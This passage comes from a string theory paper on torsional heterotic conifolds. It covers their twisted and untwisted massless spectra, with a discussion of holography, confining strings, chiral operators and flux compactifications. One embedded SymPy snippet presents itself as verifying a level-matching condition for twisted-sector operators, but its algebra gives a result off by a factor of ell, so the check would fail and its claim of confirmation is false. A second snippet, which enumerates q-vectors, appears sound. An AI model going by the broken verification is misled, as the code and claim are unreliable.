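(j_1+1)^2 + (j_2+1)^2 = \ell^2 + \ell^2 = 2\ell^2 \quad , \qquad j_1+j_2+2 = 2(\ell-1)+2 = 2\ell N\,,
\end{equation}
while the $(a,a,a)_\textsc{u} \otimes \bar{a}$ solution with $j_1=j_2=0$ trivially solves both constraints for $N=0$.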
One can attempt to obtain other massless states in the untwisted sector of the theory by considering left chiral primaries of the $(c,c,a)$ or $(c,a,c)$ type. In those cases, however, one finds that there are no solutions to the corresponding system of constraints, and so no corresponding physical states.
To summarize, the untwisted sector spectrum contains only the following states, which are all even under the left and right \textsc{gso} projections:
\begin{itemize}
\item Two chiral multiplets in space-time from $(a,a,a)_\textsc{u} \otimes \bar{c}$ worldsheet chiral primaries
with spins $j_1=j_2=\ell-1$, one in the singlet and the other one in the fundamental of $SO(26)$. These states both have space-time R-charge
$R=2(\ell-1)$.
\item Two chiral multiplets from $(a,a,a)_\textsc{u} \otimes \bar{a}$ primaries
with spins $j_1=j_2=0$, one in the singlet and the other one in the fundamental of $SO(26)$. These states both have vanishing space-time R-charge.
\end{itemize}
\subsubsection*{Twisted sector}
The analysis of the twisted sector is along the same lines, except that the spin of the second $SU(2)/U(1)$ is
different, and that the right \textsc{gso} projection is reversed.
One can first consider states of the $(a,a,a)_\textsc{t}$ type. The $SL(2,\mathbb{R})$ spin takes the values
\begin{equation}
J=\ell^2+\frac{1}{2}+\frac{j_1-j_2}{2}\,.
\end{equation}
Then, the relation between the left R-charges entails that
\begin{equation}
\left\{ \begin{array}{lcl} m_1 -2\ell M &=&2(J-1)\, =\, 2\ell^2-1+j_1-j_2 \\[4pt]
m_1 & =& 2j_1\\[4pt]
m_1-4\ell M & = & 4\ell^2-2j_2-2
\end{array}
\right. \implies j_1 + j_2+1 \,=\, 2\ell( M+\ell)\,.
\end{equation}
Now, tensoring the states under consideration with a right chiral primary of $SL(2,\mathbb{R})/U(1)$ does not give any solution. Instead, tensoring with a right anti-chiral primary of the same leads to the two constraints:
\begin{equation}
\left\{ \begin{array}{lcl} j_1^2 + (j_2+1)^2 &=& 2\ell^2\\[4pt]
j_1-j_2-1+2\ell^2 &=& 2\ell N
\end{array}
\right. \, ,
\end{equation}
which are simultaneously solved by $N=\ell$ and $M=1-\ell$. This corresponds to a state with spins
$j_1= \ell$, $j_2=\ell-1$ and $J= \ell^2+1$.
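Explicitly, these values satisfy both constraints above,
\begin{equation}
j_1^2 + (j_2+1)^2 = \ell^2 + \ell^2 = 2\ell^2 \quad , \qquad j_1-j_2-1+2\ell^2 = 2\ell^2 = 2\ell N \,,
\end{equation}
while the left-moving relation $j_1+j_2+1=2\ell(M+\ell)$ is solved by $M+\ell=1$, $i.e.$ $M=1-\ell$.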
A second kind of physical states is obtained by starting from a left $(c,a,c)_\textsc{t}$ chiral primary, with $SL(2,\mathbb{R})$ spin obeying
\begin{equation}
J=\ell^2-\frac{j_1+j_2}{2}\,.
\end{equation}
Repeating the previous analysis, the relation between the R-charges dictates
\begin{equation}
\left\{ \begin{array}{lcl} m_1 -2\ell M &=&2J = 2\ell^2-j_1-j_2\\[4pt]
m_1 & = & 2j_1\\[4pt]
m_1-4\ell M & = & 4\ell^2-2j_2
\end{array}
\right. \implies \left\{ \begin{array}{lcl} j_1&=&0 \\[4pt] j_2&=&2\ell(\ell+M) \end{array}
\right. \,.
\end{equation}
Then for a right chiral primary $\bar{c}$ of $SL(2,\mathbb{R})/U(1)$, this leads to the conditions:
\begin{equation}
\left\{ \begin{array}{lcl} 4\ell^2(M+\ell)^2 &=&0\\[4pt] \ell (M+N) & =& 0
\end{array}
\right. \, ,
\end{equation}
with a single solution for $M=-\ell$ and $N=\ell$. This implies $j_1=0$, $j_2 = 0$ and $J=\ell^2$. One can check that no other combinations of left and right
chiral primaries lead to any new massless physical state.
To summarize, we have found that the twisted sector spectrum only contains the following states:\footnote{These states
are even under the \textsc{gso}
projection because the latter is reversed in the twisted sector of the orbifold.}
\begin{itemize}
\item Two chiral multiplets in space-time from $(a,a,a)_\textsc{t} \otimes \bar{a}$ worldsheet chiral primaries
with spins $j_1=j_2+1=\ell$ and $J=\ell^2+1$, in the singlet and fundamental of $SO(26)$.
\item Two chiral multiplets from $(c,a,c)_\textsc{t} \otimes \bar{c}$ primaries
with spins $j_1=j_2=0$ and $J=\ell^2$, in the singlet and fundamental of $SO(26)$.
\end{itemize}
All these states have space-time R-charge $R=2\ell^2$. Note that the singlet $(c,a,c)_\textsc{t} \otimes \bar{c}$ state corresponds to the vertex operator that
appears in the Liouville interaction~(\ref{Liouvint}).
\begin{table}
\centering
\begin{tabular}{|l|l|l|l|}
\cline{2-4}
\multicolumn{1}{c|}{ } & Worldsheet chirality & $SU(2) \times SU(2)$ spin & Spacetime R-charge \\
\hline
Untwisted sector & $(a,a,a) \otimes \bar{c}$ & $j_1=j_2 = \ell-1$ & $R=2(\ell-1)$\\
& $(a,a,a) \otimes \bar{a}$ & $j_1=j_2 = 0$ & $R=0$\\
\hline
Twisted sector & $(a,a,a) \otimes \bar{a}$ & $j_1=j_2+1=\ell$ & $R=2\ell^2$\\
& $(c,a,c) \otimes \bar{c}$ & $j_1=j_2=0$ & $R=2\ell^2$\\
\hline
\end{tabular}
\caption{\it Massless spectrum of chiral multiplets in space-time. For each entry of the table one has one singlet and one fundamental
of $SO(26)$.}
\label{masslesstable}
\end{table}
We have summarized the whole massless spectrum found in our particular example in table~\ref{masslesstable}.
\section{Conclusion and Discussion}
In this work, we have constructed a new class of conifold backgrounds in heterotic string
theory, which exhibit non-trivial torsion and support an Abelian gauge bundle. The supersymmetry
equations and the Bianchi identity of heterotic supergravity also imply a non-trivial dilaton and a conformal factor for the conifold metric.
By implementing a $\mathbb{Z}_2$ orbifold on the $T^{1,1}$ base, one can consider resolving the conifold singularity (which is in the present case also a strong coupling singularity) by a four-cycle, leading to a smooth solution.
This is a natural choice of resolution in the heterotic context, as the resolution
is then supported by a gauge flux proportional to the normalizable harmonic two-form implied by
Hodge duality. It is of course perfectly possible
that, in addition, a deformation of the conifold singularity is allowed in the presence of torsion and of a line bundle. This would be an interesting follow-up to this work, with heterotic conifold transitions in mind.
Numerical solutions for the metric have been found in the large charge limit, such that at infinity one recovers the
Ricci-flat, K\"ahler conifold, while at finite values of the radial coordinate the conifold is squashed and warped, and acquires intrinsic
torsion, leading to a complex but non-K\"ahler space.
Remarkably, the region near the resolved conifold singularity, which can be cleanly isolated from the asymptotically Ricci-flat region by means of a double scaling limit, is found to admit a worldsheet \textsc{cft} description in terms of a gauged \textsc{wzw} model. This in principle allows one to obtain the background fields to all orders in $\alpha'$, providing by construction an exact
solution to the Bianchi identity beyond the large charge limit. We did not explicitly calculate the expressions for the
exact background fields, which is straightforward but technically involved.
Instead, we used the algebraic worldsheet \textsc{cft} to compute the full string spectrum of the theory, focusing on a particular class of shift vectors. We found a set of states localized near the resolved singularity, that give four-dimensional massless $\mathcal{N}=1$ chiral multiplets in space-time. We also emphasized the role of non-perturbative $\alpha'$ effects,
or worldsheet instantons, which manifest themselves as sine-Liouville-like interactions for generic bundles. We showed in particular how the conditions necessary for the existence of the corresponding operator in the physical spectrum of the quantum theory are related to the $\mathbb{Z}_2$ orbifold in the geometry, and how
the constraint on the first Chern class of the Abelian bundle can be exactly reproduced
from worldsheet instanton effects.
There are other interesting aspects of this class of heterotic solutions that we did not develop in the previous sections. We would therefore like to comment here on their holographic interpretation and their embedding in heterotic flux compactifications.
\subsection{Holography}\label{holo}
In the blow-down limit $a\to 0$ of the solutions~(\ref{sol-ansatz}), the dilaton becomes linear in the whole throat region,
hence a strong coupling singularity appears for $r\to 0$. As reviewed in the introduction, this breakdown of perturbation theory
generically expresses itself in the appearance of heterotic five-branes, coming from the zero-size limit of some gauge instanton.
In the present context, where the transverse space geometry is the warped conifold, the heterotic five-branes should be wrapping the vanishing two-cycle on the $T^{1,1}$ base, to eventually give rise to a four-dimensional theory. The $\mathcal{H}$-flux is indeed supported by the three-cycle orthogonal to it, see~(\ref{sol-ansatz}b). In addition, we have a non-trivial magnetic gauge flux (characterized by the shift vector $\vec{p}$) threading the two-cycle, which is necessary to satisfy the Bianchi identity at leading order. Hence we can understand this brane configuration as the heterotic analogue of fractional D3-branes on the conifold (which are actually D5-branes wrapped on the vanishing two-cycle). However here the number of branes, or the flux number, is not enough to characterize the theory, as one should also specify the actual gauge bundle intervening in the construction.
Adding a $\mathbb{Z}_2$ orbifold to the $T^{1,1}$ base of the conifold, one can consider resolving the singularity by blowing up a $\mathbb{C} P^1\times \mathbb{C} P^1$, which, in the heterotic theory, requires turning on a second Abelian gauge bundle (with shift vector $\vec{q}$). This does not change the asymptotics of the solution, hence the dilaton is still asymptotically linear; however the solution is now smooth everywhere. As for the flat heterotic five-brane solution of \textsc{chs}~\cite{Callan:1991dj}, this amounts, from the
supergravity perspective, to give a finite size to the gauge
instanton.\footnote{Unlike for non-Abelian instantons, in the present case there is
no independent modulus giving the size of the instanton.}
From the perspective of the compactified four-dimensional heterotic string,
one leaves the singularity in moduli space by moving along a perturbative branch of the
compactification moduli space, changing the vacuum expectation value of the geometrical moduli field associated with the
resolution of the conifold singularity.
Both in the blow-down and in the double-scaling limit, the dilaton is asymptotically linear, hence a holographic interpretation is expected~\cite{Aharony:1998ub}.
The dual theory should be a four-dimensional $\mathcal{N}=1$ `little string theory'~\cite{Seiberg:1997zk}, living on the worldvolume of the wrapped five-branes.
Unlike in the usual cases of type \textsc{iia}/\textsc{iib} holography, one does not have a good understanding of the dual theory at hand from a weakly coupled brane construction.
Therefore, one should guess its properties from the heterotic supergravity background. First, its global symmetries can be read from the isometries of the solution.
As for ordinary heterotic five-branes~\cite{Gremm:1999hm}, the gauge symmetry of the heterotic supergravity becomes a global symmetry. In the present case,
$SO(32)$ is actually broken to a subgroup. The breaking pattern is specified by the shift vector $\vec{p}$ which is in some sense
defined at an intermediate \textsc{uv} scale of the theory, as the corresponding gauge flux in supergravity is not supported by a normalizable two-form.
Second, the isometries of the conifold itself become global symmetries of the gauge theory, as
in \textsc{ks} theory~\cite{Klebanov:2000hb}. The $SU(2) \times SU(2)$ isometries of $T^{1,1}$ are kept unbroken at the string level, since
they correspond to the right-moving affine $\mathfrak{su}(2)$ algebras at level $\vec{p}^{\, 2}-2$.\footnote{However,
the spins of the allowed $SU(2) \times SU(2)$ representations are bounded from above, as $j_1,\, j_2 \leqslant \vec{p}^{\, 2}/2-1$.}
As in \textsc{ks} theory, the latter should be a flavour symmetry.
More interestingly, the $U(1)$ isometry along the fiber of $T^{1,1}$ is expected to give an R-symmetry in the dual theory. When the singularity is resolved (in the orbifold theory) by a blown-up four-cycle, this symmetry is broken by the Liouville potential~(\ref{Liouvintgen}) to a discrete $\mathbb{Z}_{\vec{q}^{\,2}/2-2}$ subgroup. From the point of view of the dual four-dimensional theory, it means that one considers at the singular point a theory with an unbroken
$U(1)_\textsc{r}$ symmetry. The supergravity background is then deformed by adding a normalizable gauge bundle, corresponding to $\vec{q}$,
without breaking supersymmetry. By usual AdS/CFT arguments, this corresponds in the dual theory to giving a vacuum expectation value to some
chiral operator, such that the $U(1)_\textsc{r}$ symmetry is broken to a discrete subgroup. Note that, unlike
for instance in the string dual of $\mathcal{N}=1$ \textsc{sym}~\cite{Maldacena:2000yy}, this breaking of $U(1)_R$ to a $\mathbb{Z}_{k/2}$
subgroup does {\it not} mean that the R-symmetry is anomalous, because the breaking occurs in the infrared ($i.e.$ for $r\to a$) rather than
in the ultraviolet ($r\to \infty$). One has instead a spontaneous breaking of this global symmetry, in a particular point of moduli space.
\subsubsection*{Holographic duality in the blow-down limit}
From the supergravity and worldsheet data summarized above we will attempt to better characterize the four-dimensional
$\mathcal{N}=1$ theory dual to the conifold solution under scrutiny. One actually has to deal with two issues: what is the theory
dual to the singular conifold --~or, in other words, which mechanism is responsible for the singularity~-- and what is the dual
of the orbifoldized conifold resolved by a four-cycle. A good understanding of the former would of course help to specify the latter.
First, one expects the physics at the singularity to be different for the $Spin(32)/\mathbb{Z}_2$ and the $E_8\times E_8$ heterotic string theory. As recalled in the introduction, while one does not know what happens for generic four-dimensional $\mathcal{N}=1$
compactifications, the situation is well understood for small instantons in compactifications to six dimensions.
The difference in behavior at the singularity can be understood from their different strong-coupling
limits. For $Spin(32)/\mathbb{Z}_2$ heterotic string theory, S-dualizing to type I leads to a weakly coupled description,
corresponding to an `ordinary' field theory. On the contrary, in
$E_8 \times E_8$ heterotic string theory, lifting the system to M-theory on $S^1/\mathbb{Z}_2\times K3$
leads to a theory of M5-branes with self-dual tensors, which therefore has a strongly coupled low-energy limit. Descending to four dimensions, by fibering the $K3$ on a $\mathbb{C}P^1$ base, this leads to different four-dimensional
physics at the singularity. It corresponds to strong coupling dynamics of asymptotically-free gauge groups in
$Spin(32)/\mathbb{Z}_2$~\cite{Kachru:1996ci} and to interacting fixed points connecting branches with different numbers of generations,
in the $E_8\times E_8$ case~\cite{Kachru:1997rs}.
In the present context, one can also S-dualize the $Spin(32)/\mathbb{Z}_2$ solution~(\ref{sol-ansatz}) to type I. There, in the
blow-down limit, the string coupling constant vanishes in the infrared end of the geometry ($r\to 0$), hence one expects that the low-energy
physics of the dual four-dimensional theory admits a free-field description. In terms of these variables, the theory is not asymptotically free, since the coupling constant blows up in the \textsc{uv}. This theory lives on a stack of $k$ (up to order-one corrections) type I D5-branes wrapping the vanishing two-cycle of the conifold. Such theories have $Sp(k)$ gauge groups, together with a flavor symmetry coming from the D9-brane gauge symmetry. However, as seen from the supergravity solution, one has to turn on worldvolume magnetic flux on the D9-branes in order to reproduce the theory of interest. The profile of the magnetic flux in the radial direction being non-normalizable, one expects this flux to correspond to some deformation in the Lagrangian of the four-dimensional dual theory, which breaks the $SO(32)$ flavor symmetry to a subgroup set by the choice of $\vec{p}$.
Let us consider now the $E_8\times E_8$ case. There, the singularity that appears in the blow-down limit needs to be lifted to
M-theory, where the relevant objects are wrapped M5-branes. As there is no weakly coupled description of the \textsc{ir} physics,
the dual theory should flow at low energies to an interacting theory, $i.e.$ to an $\mathcal{N}=1$ superconformal field
theory. In this case one would naively expect an $AdS_5$-type geometry, which is not the
case here. To understand this, first note that the little string theory decoupling limit is not a low-energy limit,
hence the metric should not be asymptotically $AdS$. Second, the $AdS_5$ geometry that should appear in the \textsc{ir} seems to be
'hidden' in the strong coupling region.\footnote{In type \textsc{iia} one can construct
non-critical strings with $\mathcal{N}=2$~\cite{Giveon:1999zm} or $\mathcal{N}=1$~\cite{Israel:2005zp} supersymmetry in four dimensions (whose worldsheet
\textsc{cft} description is quite analogous to the present models),
that are dual to Argyres-Douglas superconformal field theories in four dimensions. No $AdS_5$ geometry is seen in those theories, for similar reasons.}
\subsubsection*{Looking for a confining string}
The background obtained by resolution is completely smooth in the infrared, so
one may wonder whether it is confining.
One first notices that standard symptoms of confinement seem not to be present in our models. There is no mass gap, the
R-symmetry is broken spontaneously to $\mathbb{Z}_{\vec{q}^{\,2}/2-2}$ only
(rather than having an anomalous $U(1)_R$ broken further to $\mathbb{Z}_2$ by a gaugino condensate)
and the space-time superpotential for the blow-up mode --~that is associated to the gluino bilinear in \textsc{sym}
duals like~\cite{Vafa:2000wi}~-- vanishes identically, see~(\ref{superpot2}). However none of these features are conclusive,
as we are certainly dealing with theories having a complicated matter sector.
On general grounds, a confining behavior
can be found in holographic backgrounds by constructing Nambu-Goto long string probes,
attached to external quark sources in the \textsc{uv}, and showing that
they lead to a linear potential~\cite{Kinar:1998vq}. A confining behavior occurs whenever
the string frame metric component $g_{tt} (r)$ has a non-vanishing
minimum at the \textsc{ir} end of the gravitational background (forcing it to be stretched
along the bottom of the throat). A characteristic of our solution (which is probably generic in heterotic flux backgrounds)
is that the $\mathbb{R}^{3,1}$ part of the string frame metric is not warped, see eq.~(\ref{sol-ansatz}a). Therefore the Nambu-Goto action for a fundamental heterotic string will give simply a straight long string, as in flat space.
In the case of $Spin(32)/\mathbb{Z}_2$ heterotic strings, one needs to S-dualize the solution to type I, in order to study
the low-energy physics of the dual theory after blow-up. In fact, the resolution of the conifold singularity introduces a scale $1/a$, that should correspond to some mass scale in the holographically dual 4d theory.
The ratio of this scale over the string mass scale $1/\sqrt{\alpha'}$ is given by
$\sqrt{\mu/g_s}$, where $\mu$ is the double-scaling parameter that gives the effective string coupling at the bolt. Taking the doubly-scaled heterotic background in the perturbative regime, this ratio is necessarily large, meaning that one does not decouple the field theory
and string theory modes. Therefore, in order to reach the field-theory regime, one needs to be at strong
heterotic string coupling near the bolt. This limit is accurately described in the type I dual, in the \textsc{ir} part of the
geometry; however in the \textsc{uv} region $r\to \infty$ the type I solution is strongly coupled.
In type \textsc{I} the string frame metric of the solution reads:
\begin{equation}
\mathrm{d} s^2_\textsc{i} = H^{-1} (r)\, \eta_{\mu\nu}\mathrm{d} x^{\mu}\mathrm{d} x^{\nu} +\tfrac{3}{2} \mathrm{d} s^2 (\tilde{\mathcal{C}}_6)\, ,
\end{equation}
with $H(r) = \alpha' k/r^2$ and $r\geqslant a$. Taking a D1-brane as a confining string candidate, one would obtain exactly
the same answer as in the heterotic frame. One can consider instead a type I fundamental string, leading to the
behavior expected for a confining string (as $H(r)$ has a maximum for $r=a$).\footnote{In contrast, there is no obvious candidate for a confining string in the $E_8 \times E_8$ case, suggesting again that the physics of these models is different.}
A type I fundamental string is of course prone to breaking onto D9-branes, but this is the expected
behavior for a gauge theory with flavor in the confining/Higgs phase, since the
confining string can break as quark/antiquark pairs are created. More seriously, if one tries to 'connect' this string to external sources at infinity ($i.e.$ in the
\textsc{uv} of the dual theory), the heterotic description, which is appropriate for $r\to \infty$, does not describe the type I
fundamental string at all.
\subsubsection*{What is the dual theory?}
Let us now summarize our findings, concentrating on the $Spin (32)/\mathbb{Z}_2$ theory. Considering first the
blow-down limit, the mysterious holographic dual to the supergravity background~(\ref{sol-ansatz}), in the heterotic variables, is asymptotically free --~at least up to a scale where the little string theory description takes over~-- and flows to a strong coupling singularity. On the contrary, in the type I variables, the theory is IR-free but strongly coupled in the \textsc{uv}.
A good field theory example of this would be $SU(N_c)$ SQCD in the free electric phase, $i.e.$ with $N_f >3N_c$
flavors~\cite{Seiberg:1994pq}. Then, if one identifies the electric theory with the type I description and the magnetic theory
with the heterotic description one finds similar behaviors.
Pursuing this analogy, let us identify the resolution of the singularity in the supergravity solution with a (full) Higgsing of
the magnetic theory. One knows that it gives a mass term to part of the electric quark multiplets, giving an electric theory
with $N_f=N_c$ flavors remaining massless. Then, below this mass scale (that is set by the \textsc{vev} of the blow-up modulus)
the electric theory confines.
In a holographic dual of such a field theory
one would face a problem when trying to obtain a confining string solution. In fact, trying to connect
the putative string with the boundary, one would cross the threshold $1/a$ above which the electric theory has $N_f >3N_c$ flavors, hence is strongly coupled at high energies and is not described in terms of free electric quarks.
Notice that we did not claim that the field theory scenario
described above is dual to our heterotic supergravity background, rather that it is an
{\it example} of a supersymmetric field theory that reproduces the features implied by holographic duality. The actual construction of the
correct field theory dual remains as an open problem.
\subsubsection*{Chiral operators in the dual theory}
A way of better characterizing the holographic duality consists in studying chiral operators in the dual
four-dimensional theory, starting at the (singular) origin of its moduli space.
Following~\cite{Giveon:1999zm,Israel:2005zp}, the holographic duals of these operators can be found by looking at non-normalizable operators in the
linear dilaton background of interest. In our case, one considers the singular conifold, whose \textsc{cft} is summarized in the partition function~(\ref{conepf}).
This provides a definition of the dual theory at an intermediate \textsc{uv} scale, solely given in terms of the vector of magnetic charges $\vec{p}$.\footnote{The
resolved background, obtained by adding a second gauge field corresponding to the shift vector $\vec{q}$, is interpreted in the dual theory as the result of
giving a vacuum expectation value (\textsc{vev}) to some space-time chiral operator, changing the \textsc{ir} of the theory, see below.}
More specifically we look at worldsheet vertex operators of the form:
\begin{equation}
\label{vertex-op}
\mathcal{O} = e^{-\varphi (z)} e^{ip_\mu X^\mu} e^{-QJ \rho} e^{i p_x X_\textsc{l} (z)}
V_{j_1 \, m_1} (z)V_{\tilde{\jmath}_2\, m_2} (z)\bar{V}_{j_1} (\bar z)\bar{V}_{j_2} (\bar z)\bar{V}_\textsc{g} (\bar z)\, ,
\end{equation}
where $e^{-\varphi}$ denotes the left superghost vacuum in the $(-1)$ picture, $V_{j\, m}(z)$ are left-moving primaries of the
$SU(2)/U(1)$ supercoset, $\bar{V}_j (\bar z)$ are $SU(2)_{k-2}$ right-moving primaries and $\bar{V}_\textsc{g} (\bar z)$ comes from the
heterotic gauge sector. In order to obtain operators with the desired properties, one has to choose
chiral or anti-chiral operators in the $SU(2)/U(1)$ super-cosets.
Physical non-normalizable operators in a linear dilaton theory have to obey the Seiberg bound, $i.e.$ $J<1/2$ (see~\cite{Giveon:1999zm}). Furthermore, to obtain the correct
\textsc{gso} projection on the left-moving side, one chooses either $(c,a)$ or $(a,c)$
operators of $SU(2)/U(1)\times SU(2)/U(1)$. For simplicity we make the same choice of shift vector for the non-normalizable gauge field as in the remainder of the paper,
namely $\vec{p}=(2\ell,0^{15})$.
Let us for instance consider $(a,c)$ operators in the twisted sector. They are characterized by $m_1 = 2j_1$ and $m_2 = 4\ell^2-2j_2$, such that $j_1+j_2 = 2\ell(M+\ell)$.
The left and right worldsheet conformal weights of this state read:\footnote{From the four-dimensional perspective, these operators are defined off-shell. For a given value
of $p_\mu p^\mu$ the quantum number $J$ is chosen accordingly, in order to obtain an on-shell operator from the ten-dimensional point of view.}
\begin{subequations}
\begin{align}
\Delta_\textsc{ws} &= \frac{\alpha '}{4} p_\mu p^\mu + \frac{-2J(J-1)+j_1 +j_2}{4\ell^2} +
\frac{(j_1- \ell M)^2}{2\ell^2} -\frac12\,,\\
\bar{\Delta}_\textsc{ws} &= \frac{\alpha '}{4} p_\mu p^\mu + \frac{-2J(J-1)+j_1(j_1+1) +j_2(j_2+1)}{4\ell^2} + \bar{\Delta}_\textsc{g} -1\,.
\end{align}
\end{subequations}
Note that the state in the gauge sector, of right-moving conformal dimension $\bar{\Delta}_\textsc{g}$, belongs to the coset $SO(32)/SO(2)=SO(30)$
(as one Cartan has been gauged away). This leads to the condition
\begin{equation}
j_1 = \bar{\Delta}_\textsc{g} +\frac{M^2}{2} + 2\ell M +\ell^2-\frac12\, ,
\end{equation}
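This condition can be checked to follow from worldsheet level matching $\Delta_\textsc{ws}=\bar{\Delta}_\textsc{ws}$ (our assumption as to its origin): after substituting $j_2=2\ell(M+\ell)-j_1$, the terms quadratic in $j_1$ cancel and the equation becomes linear in $j_1$. A short SymPy sketch verifying this:

```python
import sympy as sp

j1, M, Dg, J = sp.symbols('j_1 M Deltabar_g J')
ell = sp.symbols('ell', positive=True)

# (a,c) twisted-sector operators: j_2 is fixed by j_1 + j_2 = 2 ell (M + ell)
j2 = 2 * ell * (M + ell) - j1

# left/right worldsheet weights; the common alpha'/4 p.p term drops out
Delta = (-2*J*(J - 1) + j1 + j2) / (4*ell**2) \
        + (j1 - ell*M)**2 / (2*ell**2) - sp.Rational(1, 2)
Deltabar = (-2*J*(J - 1) + j1*(j1 + 1) + j2*(j2 + 1)) / (4*ell**2) + Dg - 1

# level matching Delta = Deltabar turns out to be linear in j_1
sol = sp.solve(sp.Eq(Delta, Deltabar), j1)
assert len(sol) == 1
expected = Dg + M**2 / 2 + 2*ell*M + ell**2 - sp.Rational(1, 2)
assert sp.simplify(sol[0] - expected) == 0
```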
and the space-time $U(1)_R$ charge reads:
\begin{equation}
R = 2\bar{\Delta}_\textsc{g} +M^2 + 2\ell M +2\ell^2-1\,.
\end{equation}
A subset of these operators transforms in the singlet of the $SU(2)\times SU(2)$ 'flavor' symmetry. They are characterized by
$j_1=j_2=0$, hence have $M=-\ell$; their space-time R charge is $R=2\ell^2$. Such an operator can always be found for any solution of the equation
\begin{equation}
\bar{\Delta}_\textsc{g} = \frac{\ell^2+1}{2} \,,
\end{equation}
provided the state of the gauge sector $(i)$ belongs to $SO(30)_1$ and $(ii)$ is \textsc{gso}-invariant. One
can express its conformal dimension in terms of the modes of the 15 Weyl fermions as
$\bar{\Delta}_\textsc{g} =\frac{1}{2} \sum_{i=2}^{16} (N_i)^2$.
In order to express the solution of these constraints in a more familiar form, we introduce the sixteen-dimensional vector $\vec{q}=(0,N_2,\ldots,N_{16})$.
Then one finds one space-time chiral operator for each $\vec{q}$ such that
$\vec{q}^{\, 2}= \ell^2+1 = \vec{p}^{\, 2}/4+1$ and $\vec{p}\cdot \vec{q}=0$ and such that it obeys the
condition~(\ref{fwcond}), $i.e.$ $\sum_{i} q_i \equiv \ell+1 \mod 2$.
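For small $\ell$ these constraints are straightforward to scan by computer. The sketch below (an illustration of ours, not part of the construction itself) enumerates integer vectors $(N_2,\dots,N_{16})$ with $\vec{q}^{\,2}=\ell^2+1$ and $\sum_i q_i\equiv\ell+1 \bmod 2$; the orthogonality $\vec{p}\cdot\vec{q}=0$ holds automatically since the first entry of $\vec{q}$ vanishes:

```python
def q_vectors(ell, slots=15):
    """Enumerate (N_2,...,N_16) with sum N_i^2 = ell^2 + 1 and
    sum N_i = ell + 1 (mod 2); recursion with pruning on the norm budget."""
    target = ell**2 + 1
    out = []

    def build(prefix, budget):
        if len(prefix) == slots:
            if budget == 0 and (sum(prefix) - ell - 1) % 2 == 0:
                out.append(tuple(prefix))
            return
        bound = int(budget**0.5)
        for n in range(-bound, bound + 1):
            build(prefix + [n], budget - n * n)

    build([], target)
    return out

# ell = 1: q^2 = 2, i.e. two entries +-1; all 4 * C(15,2) = 420 sign patterns survive
assert len(q_vectors(1)) == 420
```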
In conclusion, the four-dimensional $\mathcal{N}=1$ theory which is dual to the warped singular conifold defined by the shift vector $\vec{p}=(2\ell,0^{15})$ contains a
subset of chiral operators in the singlet of $SU(2)\times SU(2)$, characterized by their weight $\vec{q}$ in $\mathfrak{so}(30)$. One can give a vacuum expectation value to any of these operators without breaking supersymmetry in space-time. Following the general AdS/CFT logic, this corresponds on
the gravity side to considering a normalizable deformation of the linear dilaton background, associated with
the shift vector $\vec{q}$.
One describes this process on the worldsheet by adding a Liouville potential~(\ref{Liouvintgen}) corresponding to the chosen chiral operator and satisfying $J=\ell^2$;
this operator breaks the space-time R-symmetry to $\mathbb{Z}_{2\ell^2}$.
For each consistent choice of $\vec{q}$, the perturbed worldsheet \textsc{cft} is given by one of the coset theories (\ref{cosetdef}) constructed in this work.
Note that in addition to the chiral operators discussed above, many others can be found that are not singlets of $SU(2)\times SU(2)$. In principle, these operators
can also be given a vacuum expectation value; in those cases, however, the worldsheet \textsc{cft} is, to our knowledge, no longer solvable.
As explained above we observe that, for the $E_8 \times E_8$ heterotic string theory, the singularity seems to be associated with an interacting
superconformal fixed point. In this case the conformal dimension of these operators in space-time is given by
\begin{equation}
\Delta_\textsc{st} = \frac{3}{2} | R | \, = 3\ell^2\, ,
\end{equation}
after using the $\mathcal{N}=1$ superconformal algebra.
Clearly it would be interesting to obtain a more detailed characterization of the dual theory, using for instance anomaly
cancellation as a guideline. We leave this study for future work.
\subsection{Relation to heterotic flux compactifications}
The Klebanov--Strassler type \textsc{iib} background serves a dual purpose. On the one hand, it can be used to probe
holographically non-trivial $\mathcal{N}=1$ quantum field theories. On the other hand, one can engineer
type \textsc{iib} flux compactifications which are described locally, near a conifold singularity, by
such a throat~\cite{Giddings:2001yu}; this allows one in particular to generate large hierarchies of couplings.
In this second context, the \textsc{ks} throat is glued
smoothly to the compactification manifold, at some \textsc{uv} scale in the field theory dual where the
string completion takes over. Typically the flux compactification and holographic interpretations complement each
other. One should keep in mind, however, that since the flux numbers are globally
bounded from above in orientifold compactifications with flux, the curvature of the manifold is not small from the supergravity perspective.
The resolved conifolds with flux constructed in this paper can also be considered from these two perspectives.
We have highlighted above aspects of the holographic interpretation. Here we would like to discuss their embedding
in heterotic compactifications. As outlined in the introduction, heterotic compactifications with torsion are not (in general)
conformally Calabi-Yau, and thus correspond to non-K\"ahler manifolds. This makes the global study of such compactifications, without relying on explicit examples, problematic.
In the absence of a known heterotic compactification for which the geometry~(\ref{sol-ansatz}) could be viewed
as a local model, one needs to understand how to 'glue' this throat geometry to the bulk of
a compactification. In addition the presence of a non-zero \textsc{nsns} charge at infinity makes
it even more difficult to make sense of the integrated Bianchi identity, leading to the tadpole cancellation conditions.
Let us imagine anyway that some torsional compactification manifold contains
a conifold singularity with \textsc{nsns} flux, leading to a non-zero five-brane charge. Heterotic
compactifications with five-branes are non-perturbative, as the strong coupling singularity of the five-branes takes us out of the perturbative regime. However with the particular type of resolution of the singularity used here,
corresponding to blowing-up the point-like instantons to finite-size, the effective string
coupling in the throat can be chosen as small as desired.
It corresponds, from the point of view of the four-dimensional effective theory, to moving to
another branch of moduli space which has a weakly coupled heterotic description.
There is an important difference between the fluxed Eguchi-Hanson solution that we studied in a previous
article~\cite{Carlevaro:2008qf} and the torsional conifold
backgrounds constructed in this work. In the former case, there existed a subset of line bundles
such that the geometry was globally torsion-free, $i.e.$ such that
the Bianchi identity integrated over the four-dimensional warped Eguchi-Hanson space did not
require a Kalb-Ramond flux. In other words, there was no net five-brane
charge associated with the throat. Then the torsion, dilaton and warp factor of the solution
could be viewed as 'local' corrections to this globally
torsion-less solution near a gauge instanton, that arose because the Bianchi identity
was not satisfied locally, $i.e.$ at the form level, as the gauge bundle departed from the standard embedding.
In contrast, we have seen that the smooth conifold solutions considered here can
never be made globally torsion-free, as the required shift vector $\vec{p}$ is
not physically sensible in this case. Hence from the point of view of the full six-dimensional heterotic compactification there
is always a net $\mathcal{H}$-flux associated with the conifold throat. This is not a problem in itself, but implies that the compactification is globally
endowed with torsion.
In the regime where the string coupling in the 'bulk' of the flux compactification manifold is very small,
one expects that quantities involving only the degrees of freedom
localized in the throat can be accurately computed in the double-scaling limit, where the conifold flux background admits a worldsheet \textsc{cft} description.
This aspect clearly deserves further study.
\section*{Acknowledgements}
